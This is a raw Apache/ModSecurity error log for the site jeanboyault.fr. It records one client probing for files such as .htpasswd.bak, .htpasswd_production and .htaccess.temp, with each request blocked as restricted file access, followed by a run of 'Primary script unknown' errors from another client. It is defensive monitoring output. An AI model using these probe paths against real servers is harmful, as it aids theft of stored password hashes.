[Mon May 11 11:54:33.092613 2026] [security2:error] [pid 1256241:tid 1256246] [client 185.177.72.9:35746] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.htaccess.temp"] [unique_id "agGnWZkIEwRJMyDaV55O7AAAAUA"]
[Mon May 11 11:54:34.276241 2026] [security2:error] [pid 1256241:tid 1256246] [client 185.177.72.9:35746] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnWZkIEwRJMyDaV55O7AAAAUA"]
[Mon May 11 11:54:34.301804 2026] [security2:error] [pid 1256241:tid 1256265] [client 185.177.72.9:62652] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /.htaccess.temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.htaccess.temp"] [unique_id "agGnWpkIEwRJMyDaV55O7QAAAVM"]
[Mon May 11 11:54:34.302005 2026] [security2:error] [pid 1256241:tid 1256265] [client 185.177.72.9:62652] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.htaccess.temp"] [unique_id "agGnWpkIEwRJMyDaV55O7QAAAVM"]
[Mon May 11 11:54:35.775177 2026] [security2:error] [pid 1256241:tid 1256265] [client 185.177.72.9:62652] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnWpkIEwRJMyDaV55O7QAAAVM"]
[Mon May 11 11:54:35.801964 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:62658] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /.htpasswd.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.htpasswd.bak"] [unique_id "agGnW0YQeUtAPynIs6xYswAAAAE"]
[Mon May 11 11:54:35.805613 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:62658] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.htpasswd.bak"] [unique_id "agGnW0YQeUtAPynIs6xYswAAAAE"]
[Mon May 11 11:54:36.990754 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:62658] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnW0YQeUtAPynIs6xYswAAAAE"]
[Mon May 11 11:54:37.020846 2026] [security2:error] [pid 1254242:tid 1254263] [client 185.177.72.9:62672] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /.htpasswd.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.htpasswd.bak"] [unique_id "agGnXb4KNmD_mZ_vlf85KQAAAFI"]
[Mon May 11 11:54:37.021392 2026] [security2:error] [pid 1254242:tid 1254263] [client 185.177.72.9:62672] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.htpasswd.bak"] [unique_id "agGnXb4KNmD_mZ_vlf85KQAAAFI"]
[Mon May 11 11:54:38.338353 2026] [security2:error] [pid 1254242:tid 1254263] [client 185.177.72.9:62672] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnXb4KNmD_mZ_vlf85KQAAAFI"]
[Mon May 11 11:54:38.364597 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:62680] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /.htpasswd.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.htpasswd.example"] [unique_id "agGnXmS6k_SCYd1AVZqujQAAAQ0"]
[Mon May 11 11:54:38.365369 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:62680] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.htpasswd.example"] [unique_id "agGnXmS6k_SCYd1AVZqujQAAAQ0"]
[Mon May 11 11:54:39.617919 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:62680] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnXmS6k_SCYd1AVZqujQAAAQ0"]
[Mon May 11 11:54:39.644256 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:62690] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /.htpasswd.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.htpasswd.example"] [unique_id "agGnXxjZymfuKpjWXeh9rAAAAM0"]
[Mon May 11 11:54:39.644836 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:62690] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.htpasswd.example"] [unique_id "agGnXxjZymfuKpjWXeh9rAAAAM0"]
[Mon May 11 11:54:40.879923 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:62690] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnXxjZymfuKpjWXeh9rAAAAM0"]
[Mon May 11 11:54:40.910683 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:62706] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /.htpasswd_production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.htpasswd_production"] [unique_id "agGnYEYQeUtAPynIs6xYwgAAAAo"]
[Mon May 11 11:54:40.915022 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:62706] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.htpasswd_production"] [unique_id "agGnYEYQeUtAPynIs6xYwgAAAAo"]
[Mon May 11 11:54:42.078767 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:62706] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnYEYQeUtAPynIs6xYwgAAAAo"]
[Mon May 11 11:54:42.105739 2026] [security2:error] [pid 1254242:tid 1254255] [client 185.177.72.9:62714] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /.htpasswd_production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.htpasswd_production"] [unique_id "agGnYr4KNmD_mZ_vlf85LgAAAEo"]
[Mon May 11 11:54:42.106413 2026] [security2:error] [pid 1254242:tid 1254255] [client 185.177.72.9:62714] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.htpasswd_production"] [unique_id "agGnYr4KNmD_mZ_vlf85LgAAAEo"]
[Mon May 11 11:54:43.352364 2026] [security2:error] [pid 1254242:tid 1254255] [client 185.177.72.9:62714] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnYr4KNmD_mZ_vlf85LgAAAEo"]
[Mon May 11 11:54:43.382691 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:57350] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /.htpasswd_test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.htpasswd_test"] [unique_id "agGnY2S6k_SCYd1AVZqukAAAAQU"]
[Mon May 11 11:54:43.383329 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:57350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.htpasswd_test"] [unique_id "agGnY2S6k_SCYd1AVZqukAAAAQU"]
[Mon May 11 11:54:44.553109 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:57350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnY2S6k_SCYd1AVZqukAAAAQU"]
[Mon May 11 11:54:44.582524 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.177.72.9:57356] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /.htpasswd_test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.htpasswd_test"] [unique_id "agGnZL4KNmD_mZ_vlf85LwAAAEk"]
[Mon May 11 11:54:44.582907 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.177.72.9:57356] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.htpasswd_test"] [unique_id "agGnZL4KNmD_mZ_vlf85LwAAAEk"]
[Mon May 11 11:54:45.809077 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.177.72.9:57356] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnZL4KNmD_mZ_vlf85LwAAAEk"]
[Mon May 11 11:54:48.910269 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:48.990893 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.025615 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.059824 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.094926 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.129355 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.163724 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.200643 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.235358 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.269820 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.303923 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.338234 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.372561 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.407017 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.441692 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.477830 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.512257 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.547607 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.584626 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.623126 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.658898 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.694731 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.729335 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.763791 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.798732 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.833611 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.871946 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.906669 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.942978 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:49.981879 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.017023 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.051396 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.085712 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.120209 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.155387 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.189863 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.224481 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.260028 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.294595 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.332231 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.366757 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.402976 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.443494 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.478219 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.513814 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.548196 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.582413 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.616869 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.656957 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:54:50.695135 2026] [proxy_fcgi:error] [pid 1254179:tid 1254196] [client 13.74.146.113:3332] AH01071: Got error 'Primary script unknown'
